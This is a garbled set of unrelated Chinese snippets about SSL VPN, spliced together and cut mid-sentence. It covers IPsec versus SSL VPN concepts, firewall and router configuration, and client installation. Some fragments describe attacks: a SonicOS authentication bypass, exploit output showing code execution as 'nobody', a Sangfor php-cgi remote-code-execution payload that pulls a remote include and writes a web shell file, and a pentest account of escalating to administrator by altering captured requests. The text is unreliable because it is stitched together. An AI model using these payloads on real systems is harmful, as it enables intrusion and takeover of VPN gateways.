IPsecVPN与SSLVPN概念 SSLVPN:基于安全套接字层协议(Security Socket Layer-SSL)建立远程安全访问通道的VPN技术。 解释:就是采用了ssl的加密方式,从这个也能看出来sslvpn主要作用在访问web资源,ssl握手过程给大家贴个图: sslvpn更注重过程安全和用户验证,突出全局的把控,死守外部连接到局域网的安全问题 IPsecVPN与SSLVPN 共同点 ①数据加密 ②访问内网资源 不同点 ①协议层不同 ②应用方向不同 ③投入成本不同 ④可靠性不同 详解 Ipsecvpn注重点到点之间的访问,而sslvpn注重整个从外部接入局域网的整块安全 当然了,不是说ipsecvpn就在认证上次于sslvpn,sslvpn基于应用层,高层协议的强项是对用户身份认;而ipsecvpn由于基于网络层,强项是对设备合法性进行验证,简单来说就是更注重传输过程, 应用 SSLVPN——构建零信任网络体系 零信任真的是一个近两年特别火的概念,最底层的理念就是一句话:默认拒绝所有访问。
0x00 前言 SonicOS SSLVPN是一款SSL VPN设备,旨在提供安全的远程访问解决方案,允许用户通过加密的网络连接安全地访问内部网络资源。 0x01 漏洞描述 漏洞存在于 SonicOS SSLVPN 的认证机制中,允许远程攻击者绕过认证。攻击者可以利用这一漏洞在未经过适当认证的情况下访问受保护的资源。
gateway james [FW1-sslvpn-gateway-james] ip address 10.0.0.1 [FW1-sslvpn-gateway-james]service enable [FW1-sslvpn-gateway-james]quit [FW1]sslvpn context james [FW1-sslvpn-context-james]gateway james domain james [FW1-sslvpn-context-james]url-list S5820 [FW1-sslvpn-context-james-url-list-S5820] heading ]url S5820-http url-value http://10.0.0.5 [FW1-sslvpn-context-james-url-list-S5820]quit [FW1-sslvpn-context-james ]filter web-access acl 3000 [FW1-sslvpn-context-james-policy-group-url]service enable [FW1-sslvpn-context-james
/php_class/sslvpn_class.php');:这行代码引入了一个外部的PHP类文件sslvpn_class.php,这个类包含了处理SSL VPN相关的功能。 2. * 创建了一个sslvpn_class的实例$obj_sslvpn。 * 使用switch语句根据$parts和$type的值来决定执行哪个分支的代码。 * 如果$type为mod,则调用$obj_sslvpn->sslvpn_config_mod(2);方法,这个方法可能是用来修改VPN的配置信息,参数2的具体含义需要查看sslvpn_class.php case 'mod': $obj_sslvpn->sslvpn_config_mod(2); break; default 此时我们再人工审计,确实可以看到这里直接New了一个sslvpn_class 类,然后进入到了 sslvpn_config_mod 方法中。
1.用户在SSLVPN网关登录界面选择证书后,客户端会将客户端证书发送给网关。 2.网关会将客户端证书以及自己引用的CA证书的名称发送给证书模块。 认证结果为通过的用户能够登录SSLVPN网关界面,以相应的业务权限来使用SSL VPN业务。 认证结果为不通过的用户会在客户端上看到“您的证书验证非法,请提供合法的证书”。 SSLVPN双臂组网模式应用场景分析 在此类组网环境中,SVN使用两个不同的网口连接外网与内网,这种组网方式下,具有清晰的内网、外网概念;无需做额外的配置,外网口对应虚拟网关IP,内网口配置内网管理IP 这时就需要在交换机和路由器.上配置策略路由,需要建立SSLVPN的流量就转发到SVN上,而普通的应用就直接通过防火墙访问外网。
修改 PKGBUILD 文件 将这两段(字段内容可能不一样) source=("http://download.sangfor.com.cn/download/product/sslvpn/pkg/linux 'deb171a31a3ad76342d5195a1b5bbc7c') 修改为 source=("http://download.sangfor.com.cn/download/product/sslvpn
(http://download.sangfor.com.cn/download/product/sslvpn/pkg/linux_767/EasyConnect_x64_7_6_7_3.deb) 连接
R1-ftp]get statemach.efs 123.efs (statemach.efs是源文件名,123.efs是目标文件名) 4.将文件上传到ftp-server: [R1-ftp]put sslvpn.zip
root@sslvpn:~ # cat /proc/sys/kernel/randomize_va_space root@sslvpn:~ # cat /proc/ root@sslvpn:~ # 日期 Thu Nov 25 03:29:39 PST 2021 root@sslvpn:~ # ls -l /tmp/lol ls: 无法访问 /tmp/lol: 没有这样的文件或目录 root@sslvpn:~ # ls -l /tmp/lol -rw-r--r-- 1没有人没有人0 Nov 25 08:05 /tmp/lol 如您所见,攻击者获得执行为nobody. 该漏洞利用还没有考虑由于以下原因可能发生的对齐问题: 目标使用的主机名不是sslvpn. 不是 8 字节长的目标 IP 和主机 IP。
勿将私钥PC本地保存(防止本地PC沦陷对业务集群投毒),采用私钥异地备份图片2.防开源供应链恶意投毒(1)防第三方OS操作系统投毒(请使用公共镜像,勿使用第三方自定义镜像)图片(2)防跳板机/堡垒机/SSLVPN
EasyConnectInstaller.exe 登录异常,请下载 SSL V**诊断修复工具 进行修复 http://download.sangfor.com.cn/download/product/sslvpn
-dallow_url_include=On -dauto_prepend_file=http:// #有 php-cgi 代码远程执行漏洞 http://SSLVPN.SANGFOR.COM:1000 %3E'%20%3E/app/usr/sbin/webui/html/svpn.php //修改了 http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html
•VPN功能:支持IPsec、SSLVPN,满足分支机构互联、员工远程办公的加密传输需求。 •SSLVPN:适合员工移动办公(如用笔记本、手机访问),无需安装专用客户端,通过浏览器即可接入。
0x05 漏洞分析 获取 shell 可以参考这篇博客里面提到的方法 https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve
Previously, we have been using Openconnect VPN in OpenWRT, because it is SSLVPN, and it is very convenient
cve-2023-46805/rapid7-analysis'], ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve
/log" 修改issuer(建议) issuer = "YYDY-AnyLink-SSLVPN" #自定义名称 修改管理员账户(可选) admin_user = "yydy"
Networking ️Operating 本文主要实现在OpenWRT路由器系统下搭建WireGuard服务器方便远程连接, 之前一直是在OpenWRT使用Openconnect VPN,因为是SSLVPN
然后工号和身份证组合成新账户登录,也能成功登录到教师权限的账号,没想到还有登录研究生系统的权限 点击右上角可以切换角色,这时候抓包修改数据可以越权到管理员权限 修改成1后放包后就到管理员身份了 第三阶段就是登录SSLVPN
apt-get update apt-get install openvpn easy-rsa 安装CA 1.建立CA目录,OpenVPN是一个TLS/SSLVPN,这意味着它需要使用证书来在客户端和服务器之间加密数据